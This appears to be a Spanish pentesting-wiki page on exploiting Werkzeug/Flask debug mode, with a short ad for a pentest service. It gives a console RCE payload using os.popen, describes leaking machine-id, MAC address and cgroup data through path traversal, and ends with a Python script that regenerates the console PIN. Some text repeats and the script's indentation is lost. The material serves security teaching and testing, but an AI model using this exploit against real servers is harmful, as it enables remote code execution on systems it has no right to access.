Werkzeug / Flask Debug

Obtén la perspectiva de un hacker sobre tus aplicaciones web, red y nube

Encuentra y reporta vulnerabilidades críticas y explotables con un impacto real en el negocio. Usa nuestras más de 20 herramientas personalizadas para mapear la superficie de ataque, encontrar problemas de seguridad que te permitan escalar privilegios y usar exploits automatizados para recopilar evidencia esencial, convirtiendo tu arduo trabajo en informes persuasivos.

Penetration testing toolkit, ready to usePentest-Tools.com

Console RCE

Si el modo de depuración está activo, podrías intentar acceder a /console y obtener RCE.

__import__('os').popen('whoami').read();

También hay varios exploits en internet como este o uno en metasploit.

Protección por PIN - Traversal de Ruta

En algunas ocasiones, el endpoint /console estará protegido por un pin. Si tienes una vulnerabilidad de traversal de archivos, puedes filtrar toda la información necesaria para generar ese pin.

Exploit de PIN de la Consola de Werkzeug

Forzar una página de error de depuración en la aplicación para ver esto:

The console is locked and needs to be unlocked by entering the PIN.
You can find the PIN printed out on the standard output of your
shell that runs the server

Un mensaje sobre el escenario "consola bloqueada" se encuentra al intentar acceder a la interfaz de depuración de Werkzeug, indicando un requisito de un PIN para desbloquear la consola. Se sugiere explotar el PIN de la consola analizando el algoritmo de generación de PIN en el archivo de inicialización de depuración de Werkzeug (__init__.py). El mecanismo de generación de PIN se puede estudiar en el repositorio de código fuente de Werkzeug, aunque se aconseja obtener el código del servidor real a través de una vulnerabilidad de recorrido de archivos debido a posibles discrepancias de versión.

Para explotar el PIN de la consola, se necesitan dos conjuntos de variables, probably_public_bits y private_bits:

probably_public_bits

• username: Se refiere al usuario que inició la sesión de Flask.

• modname: Generalmente designado como flask.app.

• getattr(app, '__name__', getattr(app.__class__, '__name__')): Generalmente se resuelve en Flask.

• getattr(mod, '__file__', None): Representa la ruta completa a app.py dentro del directorio de Flask (por ejemplo, /usr/local/lib/python3.5/dist-packages/flask/app.py). Si app.py no es aplicable, intente app.pyc.

private_bits

• uuid.getnode(): Obtiene la dirección MAC de la máquina actual, con str(uuid.getnode()) traduciéndola a un formato decimal.

• Para determinar la dirección MAC del servidor, se debe identificar la interfaz de red activa utilizada por la aplicación (por ejemplo, ens3). En casos de incertidumbre, filtrar /proc/net/arp para encontrar el ID del dispositivo, luego extraer la dirección MAC de /sys/class/net/<device id>/address.

• La conversión de una dirección MAC hexadecimal a decimal se puede realizar como se muestra a continuación:

# Ejemplo de dirección MAC: 56:00:02:7a:23:ac
>>> print(0x5600027a23ac)
94558041547692

• get_machine_id(): Concatena datos de /etc/machine-id o /proc/sys/kernel/random/boot_id con la primera línea de /proc/self/cgroup después de la última barra (/).

</details>

Al compilar todos los datos necesarios, se puede ejecutar el script de explotación para generar el PIN de la consola de Werkzeug:

Al compilar todos los datos necesarios, se puede ejecutar el script de explotación para generar el PIN de la consola de Werkzeug. El script utiliza los `probably_public_bits` y `private_bits` ensamblados para crear un hash, que luego se somete a un procesamiento adicional para producir el PIN final. A continuación se muestra el código en Python para ejecutar este proceso:
```python
import hashlib
from itertools import chain
probably_public_bits = [
'web3_user',  # username
'flask.app',  # modname
'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.5/dist-packages/flask/app.py'  # getattr(mod, '__file__', None),
]

private_bits = [
'279275995014060',  # str(uuid.getnode()),  /sys/class/net/ens33/address
'd4e6cb65d59544f3331ea0425dc555a1'  # get_machine_id(), /etc/machine-id
]

# h = hashlib.md5()  # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
# h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num

print(rv)